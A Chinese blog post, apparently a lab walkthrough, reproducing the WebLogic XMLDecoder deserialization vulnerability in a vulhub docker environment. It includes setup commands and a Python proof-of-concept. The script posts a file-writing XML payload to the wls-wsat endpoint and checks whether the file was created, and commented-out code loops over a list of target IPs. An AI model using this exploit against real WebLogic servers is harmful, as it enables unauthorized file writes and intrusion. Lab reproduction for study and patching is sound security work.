博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
WebLogic XMLDecoder反序列化漏洞复现
阅读量:4949 次
发布时间:2019-06-11

本文共 1560 字,大约阅读时间需要 5 分钟。

WebLogic XMLDecoder反序列化漏洞复现

 

参考链接:

 

git clone https://github.com/vulhub/vulhub.git

cd vulhub/weblogic/ssrf/

docker-compose up -d

 

这时我们就可以访问docker中weblogic的地址,地址为ubuntu(IP):7001,访问 http://192.168.126.142:7001/ 如下图搭建成功。

 

 

检验POC

import requestsheaders = { 'Content-type': 'text/xml' }data = '''
servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/weblogic.txt
Weblogic_Test
'''def exp(ip): # ip = ip.strip("\n") url_post = ip + "/wls-wsat/CoordinatorPortType11" url_myfile = ip + "/bea_wls_internal/weblogic.txt" # print("Test for " + ip + ".....") r = requests.post(url=url_post,data=data,headers=headers) r2 = requests.get(url_myfile) if r2.status_code != 404: print("Weblogic Vulnerable!!!") print("You file path is " + url_myfile) else: print("No Vulnerable!!!") # print("=================================================")if __name__ == '__main__': # Weblogic_IP_list = [] # with open("weblogic.txt") as f: # Weblogic_IP_list = f.readlines() # for ip in Weblogic_IP_list: # exp(ip) ip = "http://192.168.126.142:7001" exp(ip)

 

 

在/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/weblogic.txt目录下生成weblogic.txt,访问证明漏洞存在

 

 

复现完成。

转载于:https://www.cnblogs.com/zhaijiahui/p/8179115.html

你可能感兴趣的文章
Windows Azure Platform Introduction (4) Windows Azure架构
查看>>
【转】chrome developer tool 调试技巧
查看>>
mahout运行测试与kmeans算法解析
查看>>
互相给一巴掌器
查看>>
Android SDK环境变量配置
查看>>
VM10虚拟机安装图解
查看>>
9、总线
查看>>
Git 笔记 - section 1
查看>>
java通过jsp+javaBean+servlet实现下载功能
查看>>
STM32 使用Cubemx 建一个USB(HID)设备下位机,实现数据收发
查看>>
异步表单提交
查看>>
[洛谷U871]building
查看>>
次小生成树
查看>>
Redis在windows下安装过程
查看>>
ip转城市接口,ip转省份接口,ip转城市PHP方法
查看>>
android 注释常用标签
查看>>
Spring context:property-placeholder 一些坑
查看>>
如何使用 adb 命令实现自动化测试
查看>>
中国剩余定理
查看>>
JS中this的详解及例子
查看>>